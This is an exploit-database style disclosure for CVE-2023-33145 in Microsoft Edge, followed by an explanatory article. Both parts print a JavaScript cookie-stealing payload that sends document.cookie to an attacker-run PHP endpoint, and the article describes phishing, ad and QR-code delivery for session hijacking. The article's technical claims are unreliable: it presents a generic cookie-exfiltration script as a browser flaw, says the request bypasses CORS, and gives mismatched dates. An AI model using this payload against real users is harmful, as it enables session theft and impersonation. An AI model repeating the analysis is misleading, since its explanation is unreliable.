Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: Local Language: JavaScript Published Date: 2023-07-06 
## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.

## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!

## Staus: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)

<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>

## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spend:
01:30:00


CVE-2023-33145: Microsoft Edge 114.0.1823.67 (64-bit) – Information Disclosure Vulnerability

Microsoft Edge, one of the most widely used web browsers globally, has been found to contain a critical information disclosure vulnerability identified as CVE-2023-33145. This flaw, discovered by cybersecurity researcher nu11secur1ty and reported on June 7, 2023, exposes sensitive user data through a seemingly innocuous mechanism: a crafted URL click.

Understanding the Vulnerability

The vulnerability stems from a client-side information leakage issue in Microsoft Edge version 114.0.1823.67 (64-bit). When a user clicks on a maliciously crafted hyperlink, the browser inadvertently transmits sensitive data—such as cookies, session tokens, nonces, IP addresses, User-Agent strings, and other session-specific identifiers—directly to a remote server without explicit user consent or proper security controls.

This behavior is particularly dangerous because it leverages a common user interaction: clicking on a link. Attackers can exploit this via social engineering techniques such as phishing, disguised links, or even through malware-infected advertisements, making detection extremely difficult.

Exploitation Mechanism: STRIDE Threat Modeling in Action

nu11secur1ty used STRIDE Threat Modeling—a widely adopted framework for identifying security threats—to design the exploit. STRIDE stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. In this case, the Information Disclosure component was exploited with precision.

Attackers craft a URL that triggers a cross-site information leak by leveraging the browser’s default behavior when handling image requests. The attacker uses a <script> tag embedded in a malicious webpage to silently send user data to a remote server via an <img> element.


 var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)

Explanation: This JavaScript snippet creates an Image object and sets its src attribute to a remote endpoint (e.g., PoCsess.php). When the browser loads this image, it automatically sends a HTTP GET request to the server, including the document.cookie value in the query string. The escape() function encodes the cookie data to prevent URL parsing issues.

Because the request is initiated by the browser itself, it bypasses typical client-side protections like CORS (Cross-Origin Resource Sharing) and does not require user interaction beyond clicking the link. This makes the attack stealthy and hard to detect through standard logging or browser security warnings.

Real-World Implications and Use Cases

Consider a scenario where a user receives a seemingly harmless link via email, social media, or a compromised website:

  • Phishing email: "Click here to claim your reward!" – the link redirects to a malicious site that silently captures session cookies.
  • Malicious ad: An advertisement on a legitimate site that triggers the exploit when clicked.
  • QR code: A physical QR code that leads to a page with the exploit code, used in physical social engineering attacks.

Once the attacker collects the document.cookie, they can:

  • Steal active session tokens
  • Impersonate the user on authenticated websites
  • Access private data or perform unauthorized actions

Why This is a High-Risk Vulnerability

CVE-2023-33145 is classified as High Severity due to:

Factor Description
Attack Vector Remote, user-initiated (low barrier to entry)
Exploit Complexity Low – requires only a crafted URL and minimal scripting
Impact High – full session hijacking possible
Detection Difficulty Very high – no browser warnings, no visible payload

Moreover, the exploit does not require any persistent malware or advanced technical skills. It relies solely on user behavior, making it highly effective in real-world environments.

Mitigation and Best Practices

While Microsoft has not yet released a patch for this specific version, users and organizations should adopt proactive measures:

  • Disable automatic image loading in browsers (if supported).
  • Use ad blockers and phishing detection tools (e.g., uBlock Origin, browser built-in security features).
  • Verify URLs before clicking – especially from unknown sources.
  • Implement strict Content Security Policy (CSP) on websites to prevent inline script execution.
  • Use multi-factor authentication (MFA) to reduce reliance on cookies.

For developers, the key takeaway is to never trust user input and to sanitize all data before transmission. Even seemingly harmless elements like <img> can be exploited if they reference external resources.

Conclusion

CVE-2023-33145 highlights a critical flaw in how modern browsers handle client-side data exposure. It demonstrates that even minor design oversights can lead to significant security risks. As the attack surface expands with new features, developers and users alike must remain vigilant.

Always ask: “What data is being sent when I click a link?” and “Who is receiving it?”. In today’s digital landscape, the simplest click can be the most dangerous.